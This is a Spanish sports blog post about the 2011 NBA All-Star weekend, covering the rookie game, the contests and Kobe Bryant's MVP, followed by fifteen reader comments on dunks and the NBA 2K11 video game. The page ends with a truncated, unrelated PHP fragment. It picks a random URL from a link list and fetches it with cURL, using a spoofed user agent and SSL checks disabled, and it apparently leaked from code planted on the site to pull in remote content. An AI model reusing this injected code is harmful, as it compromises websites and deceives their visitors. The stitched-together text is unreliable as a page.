AllStar 2011 – Ligera mejora

21 de February de 2011 por TheDeerHunter

Terminó la 60ª edición del All-Star Weekend de la NBA, disputada en el Staples Center de Los Ángeles. Sin la ostentosa parafernalia de la anterior cita que tuvo lugar en el Cowboys Stadium de Dallas el espectáculo de este fin de semana nos deja un buen sabor de boca y nos reconcilia a algunos con el espíritu festivo-no competitivo de un evento de tales características. Y encima tuvo unas excelentes audiencias. Mejor que mejor.

Como hicimos en años anteriores (2009, 2010-1, 2010-2, 2010-3), resumimos-comentamos-criticamos lo que dio de si la fiesta de la NBA.

Rookies vs Sophomores

No podemos negarlo. No éramos optimistas con lo que nos iban a ofrecer y no teníamos el ánimo para demasiadas chorradas al uso. En el staff de TJNBA cada vez quedan menos entusiastas y nuestro frickismo no nos llega para aguantar absolutamente todo lo que nos echen en detrimento de nuestras horas de sueño. La pereza era tremenda ante un Rookie-Challenge que literalmente nos inspira pavor, y más si nos enteramos que en el partido de “celebrities” que había tenido lugar antes el MVP fue Justin Biever… Madre del amor hermoso.

Y con tales antecedentes comenzamos el viernes. No os voy a engañar… si me hubiera surgido cualquier otro plan por regulero que fuera no lo hubiera visto en directo. Visto lo visto yo creo que es el formato más mejorable de todos, porque vale que no sea siquiera un entrenamiento, vale que se trata de una pachanga en toda regla de dos bandas de chavales, pero el sonrojo y la vergüenza ajena que causa ver a todo dios andando excepto cuando le toca a cada uno hacer su “jugadita” roza lo abominable. Si no logran corregir mínimamente esa imagen de indolencia supina que transmiten será mejor que lo quiten.

Tratándonos de abstraer de ese desagradable detalle, sin Tyreke Evans y con Brandon Jennings renqueante los jugadores de segundo año lo tenían bastante mal. Dos jugadores de un corte bastante práctico como DaJuan Blair y James Harden fueron los mejores del combinado. Por los rookies gran actuación de la parejita de Kentucky… Como definió sesudamente DeMarcus Cousins “Él (referido a Wall) iba a por el récord de asistencias y yo a por el MVP”. Y al final Wall se llevó ambas cosas y, además, pudimos disfrutar con 4 alley-oops de “La Bestia”. De postre un buen partido de Wesley Johnson, que en los Wolves no se prodiga en exceso.

Concursos

El sábado, bajo mi punto de vista, estuvo francamente bien. Vimos a Kenny Smith anotar la del medio campo con una facilidad tremenda, aunque el gato al agua se lo llevó un Steve Kerr en un estado de forma admirable. La prueba de habilidades, aunque sólo sea por el amor propio, lleva cada uno a esforzarse mucho más que 10 tíos el día anterior. Stephen Curry nos deleitó con su elegancia y se lo ganó por la mano a Westbrook, que es uno de esos que no regalan nada. Son dos eventos ligeros, cortos y entretenidos. Por mi parte si no tienen que ser los platos principales de la velada no molestan en absoluto.

El concurso de triples siguió “in crescendo” el nivel de interés. Qué gozada ver a Pierce tratando de amargarle la noche al respetable del Staples, o la increíble mecánica de lanzamiento de Ray Allen. Hubo milagro de James Jones y el público pudo celebrar de lo lindo que no ganara un representante de los Celtics.

Y por último llegaba Blake Griffin para el concurso de mates con una espectación tremenda, aunque con reservas, por supuesto. Este formato tiene un defecto: con las repeticiones se pierde el factor sorpresa y por momentos resulta tedioso. Por contra, permite la posibilidad de asumir riesgos y que veamos determinados mates que con el formato antiguo nadie se plantearía siquiera. Un par de minutos de tiempo para intentarlo no parece algo inadmisible.

Serge Ibaka y DeRozan fueron eliminados con dos mates por cabeza de finalísima (o campeonato) en muchas de las ediciones anteriores. Puntualizar que en únicamente uno de ellos cada uno no salió el mate a la primera y en los otros dos tampoco hicieron falta demasiadas repeticiones. En cierto modo ambos fueron penalizados por los jueces.

McGee nos brindó dos mates exageradísimos, difíciles y novedosos. Sólo un hombre de 2,13 y de tal movilidad podría soñar con hacerlos. No le salió a la primera, pero eso no le quita un ápice de mérito. Pasarán a la historia. Su gran ‘pero’ fue que soltó toda la dinamita en la primera fase y para la final fue demasiado convencional. Fantástica actuación, no obstante.

Griffin no fue tan original pero nos ofreció 3 mates brutales que justificaron la noche y el título. El cuarto porque no le salió y decidió abortarlo por otra versión menos exigente que si no hubiera sido la locura. Tanto la versión a tablero del mate de codo de Vince, como la del alley-oop sobre el coche los logró a la primera. El 360 inverso fue también increíble aunque tuvo que repetirlo. Si hubiera logrado el que intentó contra el borde del tablero (se intuía que lo quería enlazar con otro 360º) pienso que estaríamos hablando del mejor mate de la historia.

All Star Game

El domingo se cumplió la tónica habitual de los partidos del All Star: Risas y juergas durante 36 minutos y emoción y un poco más de seriedad en los 12 últimos minutos. ¿Vale la pena perder tantas horas de sueño por ese último cuarto?

El partido comenzó con un equipo del Oeste muchísimo más serio liderado por un Kobe al que en seguida se le vieron las intenciones. Ante su público, no quería dejar pasar la oportunidad de ganar su 4º MVP y empatar con Bob Pettit como el jugador con más MVP del All Star de la historia.  En el Este, en cambio, se intentaron muchas filigranas con escaso acierto, perdiendo balones continuamente y observando como el Oeste se ponía las botas tan solo al contraataque y defendiendo con un puntito más de intensidad. Con esta sencilla receta se inició el último cuarto con el Oeste 17 puntos de arriba y un partido que parecía decidido.

Kobe se sonreía, saboreando ya su MVP, pero no contaba con el orgullo de Lebron James. En un arranque de rabia, Lebron liquidó la diferencia en 6 minutos con un parcial de 17-3, devolviendo de un plumazo todo el interés al partido. Kobe desapareció en los últimos minutos y tuvieron que ser Pau Gasol y sobretodo Kevin Durant los que certificaran la victoria del Oeste. “The King” tuvo que conformarse con ser el único jugador junto a Michael Jordan en acabar el All Star Game con un triple doble (29 puntos, 12 rebotes y 10 asistencias). Finalmente, los 37 puntos y 14 rebotes de Kobe valieron más (evidentemente…) que los 34 puntos y la buena actuación de Kevin Durant en los minutos finales y Kobe pudo respirar tranquilo y sonreir mientras recibia el trofeo de las manos de Stern.

No se trató de un partido muy espectacular a parte de los típicos mates estratosféricos de jugadores como Lebron o  Westbrook completamente solos o de alguna jugadita del Oeste muy bien trenzada con Chris Paul o Deron Williams por el medio. En el Este, aparte de Lebron, destacó especialmente un Amare Stoudamire que se aprovechó al principio de su emparejamiento contra un horribilísimo Carmelo Anthony y que se cascó un triplazo en plena remontada en el último cuarto para enmarcar. Por el Oeste, a parte de los ya mencionados Kobe y Durant, el mejor fue un Pau Gasol que actuó, de facto, como pívot titular del Oeste al disputar los últimos minutos del partido.

El All Stars de 2011 pudo ser el último de jugador de como Tim Duncan, Kevin Garnett o Ray Allen. Sólo por eso ya merece ser recordado…

Imágenes | Getty Images / AP Photos

Comenta

15 comentarios a esta entrada

  1. Busky23 dice:
    #1

    Bueno,al final ha quedado un All-Star bastante apañadito,del partido de rookies nada que decir,pachanga de las buenas,el sabado el menú era más digerible,noche de concursos,con participantes ilustres de la liga,en especial el de habilidades donde se retaban los más rápidos de la liga y el concurso de triples,aquí me paro,lamentable primera ronda,en especial Durant y Gibson,creo que hasta yo lo hubiera hecho mejor. La final ya estuvo más acorde con los participantes y el tapado se llevo el cheque a Miami,una pena por Allen.(quien necesita un club de fans teniendo esa madre dándolo todo cual quinceañera 😉 )
    Slam Dunk- Si,ganó Griffin,pero en mi opinión ninguno de los 3 mejores mates de la noche fueron suyos,yo me quedo,por plasticidad con el segundo de De Rozan y con el mate a dos canastas y 3 balones de McGee por dificultad y originalidad.
    Estuvo entretenido pero eso de compararlo con el del año 2000 como han echo “algunos”… hay un mundo.
    AllStarGame: iluso de mi el creer que Durant iba a ser MVP…en los Ángeles Kobe no iba a permitir que eso pasara y desde el primer minuto se puso manos a la obra…ya van 4 para The Black Mamba…leyenda viva.
    Duncan titular,simple anécdota,Gasol asumió ese papel haciendo un partido más que digno,ese palmeo final fue medio partido.
    Al final gracias a Lebron ( que bestia por dios),vimos un final emocionante.
    Resumiendo,un fin de semana entretenido,ahora empieza la hora de la verdad,el camino hacia los playoffs,muchas incognitas,movimientos y traspasos que pueden marcar esta segunda parte de la temporada.

      Citar

  2. Txusma dice:
    #2

    Si no tuviera que quedarme despiertos hasta las tantas seguro que no juzgaba tan severamente el AllStar. No deber ser lo mismo verlo a las 18h00, con unas palomitas, con unos amigos, que hacer tiempo hasta las 2h00 tu solo en casa, medio dormido y luego tener que aguantar a McGee haciendo 134 intentos por mate.
    Lo de McGee es ejemplo pero aprovecho para decir que estoy de acuerdo en que son mates originales y difíciles pero esteticamente no son muy bonitos que digamos. No hay potencia ni plasticidad y si ya tienes que aguantar 5 intentos que eliminan del todo el factor sorpresa, apaga y vámonos. Tb estoy de acuerdo en que el 2º de DeRozan es muy bueno y no me disgustaron los de Ibaka, logrados en 3 intentos en total. De todas maneras, Griffin me parece un justo vencedor.
    Ya lo propuse hace años pero yo haría una primera ronda de concurso al estilo NBA2k11 (por cierto, alguien juega?). 2 minutos para hacer todos los mates que puedas y puntuación global. Después, los 3 mejores a la final, donde se podrían dejar los 2 minutos por mate. Creo q podría funcionar.
    Sobre el AllStarGame, suerte del final del Este que sinó hubiera sido uno de los partidos más sosos que recuerdo. El intento de Lebron de emular a T-Mac con un mate a tabla, sintomático…

      Citar

  3. Vader dice:
    #3

    @Txusma

    Yo si juego al NBA 2k11, es brutal… Sobre el concurso de mates el que más me gusto fue el que comentais de DeRozan. Me esperaba un poquito más de Griffin la verdad, aunque me parece bien que ganara. En estos eventos echo bastante de menos la narración del gran A.Montes que lo hacia mucho más entretenido. No me gusto mucho Arlaukas criticando cualquier cosa… vaya forma de vender el producto que estas ofreciendo…

    Y para acabar decir que el concurso del 2000 entre Carter, McGrady y Francis es para mi el mejor de la historia.

    Saludos!!

      Citar

  4. KB # 24 dice:
    #4

    Pues yo también juego al nba 2k11, que por cierto estoy enganchadisimo! Estoy 16000 en el ranking mundial, podríamos hacer unos versus!

    Por cierto, para mi gusto, el mejor mate (sin tener en cuenta el del coche de griffin) es el 2o de DeRozan, todo plasticidad.

    Me he fijado que en los últimos años se está poniendo de moda que en los concursos de mates vayan participando cada vez hombres más altos (DH12, Ibaka, Griffin, McGee) y la verdad no me gusta nada. Prefiero los Shannon Brown, Gerald Green, Eric Gordon,… Nunca un mate de un 7 pies podrá igualar en plasticidad a uno de un escolta. Me gustaría ver a McGee con los brazos levantados a la altura qué le debe quedar la canasta, 30cms??

      Citar

  5. sergio dice:
    #5

    Soy el unico al que el mate del muñeco de Ibaka le resultó espectacular? Original… y encima llega con el hombro a la altura del aro. Y el del tiro libre… aunque no lo quedara muy estetico es el triple mas lejano que recuerdo

      Citar

  6. HisRoyalAirness dice:
    #6

    Pues a mí el partido me ha gustado mucho, aún lo acabo de ver, basicamente porque nadie quería dejar anotar al contrario. Me esperaba un correcalles lamentable, como el año pasado, y me he llevado una grata sorpresa.
    Para mí los dos mejores mates del concurso son el de DeRozan a aro pasado, el primero de Blake y el del muñeco de Ibaka. El de Ibaka de la línea de libres está muy bien pero ya lo han hecho Howard, Wilkins, Jordan y alguno más; sí, saltó 7 cm más atrás que Jordan pero MJ mide 12 centímetros menos.

    Qué si jugamos al 2k11? En mi casa están hasta los huevos de que les eche broncas a mis compañeros de equipo como si fuese un partido real, es una enfermedad y un vicio increíble. Para cuándo un artículo sobre el 2k11?

      Citar

  7. miquel dice:
    #7

    Para mi tendrian qe darle un poco mas de puntuacion a ibaka el superman es tremendo saltando sin pisar casi la linea i el de la boca i el peluche pos tambien yo creo que un 93 se lo merecia

      Citar

  8. Txusma dice:
    #8

    #HisRoyalAirness Medir 2.08 a la hora de hacer mates lo consideramos una ventaja o un inconveniente? Para hacer lo de las 2 canastas está claro que has de tener una envergadura parecida a la de un autobus pero para saltar dsd el tiro libre creo que es más fácil hacerlo midiendo 1,98 que 2,08…

      Citar

  9. HisRoyalAirness dice:
    #9

    Huy, pues tengo mis dudas… está claro que hay que desplazar más peso pero también hay que tener en cuenta que con menos altura de salto pueden llegar al aro más facilmente (por la longitud de brazos) y la plasticidad y la estética del, por ejemplo, salto de MJ yo aún no la he visto repetida. Creo que Jordan llega más cerca del aro con la cabeza que Ibaka y eso dice mucho.
    Que a Serge la puntuaron por lo bajo? Sin duda, para mí merecía entrar en la segunda ronda pero te hablo del mate en sí, no lo comparo con los de la competición. La dificultad del del muñeco es muy grande, enorme.

      Citar

  10. HisRoyalAirness dice:
    #10

    De todas maneras entiendo tu punto de vista Txusma

      Citar

  11. Txusma dice:
    #11

    El mate de Jordan es mejor estéticamente, en eso estoy muy de acuerdo. La cuestión es que creo q se demuestra q hemos asistido a un muy buen concurso pq hemos destacado mates de todos los participantes. Mi único pero va a gustos: paso de 2 canastas, 3 pelotas, cabinas, kryptonitas, coches, balones en llamas, etc… Por eso a McGee lo hubiera dejado fuera en favor de Ibaka o DeRozan.

    Sí que habrá que quedar de alguna manera para jugar al NBA2k11 aunque yo ahora tengo mucho menos tiempo que hace un par de meses…

      Citar

  12. HisRoyalAirness dice:
    #12

    Sí, yo la verdad es que no sé cómo hacer para jugar online aunque es verdad que yo juego en el PC y la mayoría jugaréis en la Play.
    Si os apetece montar una pachanga yo me apunto

      Citar

  13. jona dice:
    #13

    yo lo tengo para la 360 , tambien me apunto si lo teneis alguno

      Citar

  14. Len Bias dice:
    #14

    Yo juego para PC, pero tampoco se cómo hacer para jugar online.

      Citar

  15. Txusma dice:
    #15

    Al final nadie juega en Play ?:(

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>